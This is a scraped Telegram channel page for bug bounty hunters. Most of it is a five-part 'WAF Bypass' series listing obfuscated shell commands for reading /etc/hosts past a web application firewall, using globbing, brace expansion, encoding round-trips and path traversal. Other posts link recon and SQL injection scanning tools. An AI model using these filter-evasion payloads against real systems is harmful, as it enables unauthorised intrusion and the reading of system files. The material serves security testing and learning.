ru
Feedback
Bug Bounty - GitBook

Bug Bounty - GitBook

Открыть в Telegram
7 451
Подписчики
+524 часа
+107 дней
+17130 день
Архив постов
⚡Bypass Series for bug hunters😎 Part-5 (last part) Crazy WAF Bypass: cat /etc/hosts - triggers WAF tar cf - /etc/hosts | tar
⚡Bypass Series for bug hunters😎 Part-5 (last part) Crazy WAF Bypass: cat /etc/hosts - triggers WAF tar cf - /etc/hosts | tar xf - -O gzip -c /etc/hosts | gzip -d less /e*c/h*st* more /e{t,c}*/{o,h}*s*{s,t} strings /??c/??sts sort /etc/hosts | uniq @GitBook_s

⚡Bypass Series for bug hunters😎 Part-4 Crazy WAF Bypass: cat /etc/hosts - triggers WAF rev /etc/hosts | rev od -An -c /etc/hosts | tr -d ' ' cat $HOME/../../etc/hosts cat ${PWD}/../../../etc/hosts grep "" /etc/hosts cut -c1- /etc/hosts paste /etc/hosts @GitBook_s

⚡Bypass Series for bug hunters😎 Part-3 Crazy WAF Bypass: cat /etc/hosts - triggers WAF cat < /etc/hosts cat /proc/self/fd/0 < /etc/hosts cat /etc/hosts | base64 | base64 -d cat /etc/hosts | string collect cat /etc/hosts | while read line; echo $line; end echo (cat /etc/hosts) @GitBook_s

⚡Bypass Series for bug hunters😎 Part-2 Crazy WAF Bypass: cat /etc/hosts - triggers WAF xxd -p /etc/hosts | xxd -p -r xargs -d '\n' -I{} echo {} < /etc/hosts perl -pe '' /etc/hosts sed '' /etc/hosts awk '{print}' /etc/hosts dd if=/etc/hosts 2>/dev/null @GitBook_s

WAF Bypass Series for bug hunters😎 Part-1 Crazy WAF Bypass: cat /etc/hosts - triggers WAF tac /etc/hosts - 🧙‍♂️ man /etc/hosts - 😎 nl /etc/hosts - 🤯 less /etc/hosts - 🤫 more /etc/hosts - 😌 strings /etc/hosts - 😁 tail /etc/hosts - 😅 head /etc/hosts -🥱 @GitBook_s

photo content

نکته طلایی واقعا خیلی مهمه خیلی از افراد دیدم این اشتباه رو میکنن اصلا کار خوبی نیست .
نکته طلایی واقعا خیلی مهمه خیلی از افراد دیدم این اشتباه رو میکنن اصلا کار خوبی نیست .

به جز بحث bug bounty پروژه ای کار کردن هم این بدی رو داره .
به جز بحث bug bounty پروژه ای کار کردن هم این بدی رو داره .

Repost from Code Review
+1
Full Time Bug Bounty Blueprint - Persian.pdf4.56 KB

Repost from Code Review
اگر میخواین به Bug Bounty به عنوان یک کار تمام وقت نگاه کنین ، حتما این راهنمای فوق‌العاده‌ی Rhynorater رو بخونین. دوتا نسخه اینجا هست که یکیش انگلیسی و اصلی هست و برای سادگی کار یه نسخه فارسی هم ترجمه کردم.

Language: persian

Repost from 🕸 Articles
Author: zarvan Telegram channel: @web_articles

🤫30 Cybersecurity search engines🔥
🤫30 Cybersecurity search engines🔥

⚠️CF-Hero is a reconnaissance tool that uses multiple data sources to discover the origin IP addresses of Cloudflare-protecte
⚠️CF-Hero is a reconnaissance tool that uses multiple data sources to discover the origin IP addresses of Cloudflare-protected web applications. https://github.com/musana/CF-Hero

A simple Python script to scan multiple targets for SQL Injection via HTTP headers like User-Agent, X-Forwarded-For, and X-Cl
A simple Python script to scan multiple targets for SQL Injection via HTTP headers like User-Agent, X-Forwarded-For, and X-Client-IP. https://github.com/ifconfig-me/SQLi-Scanner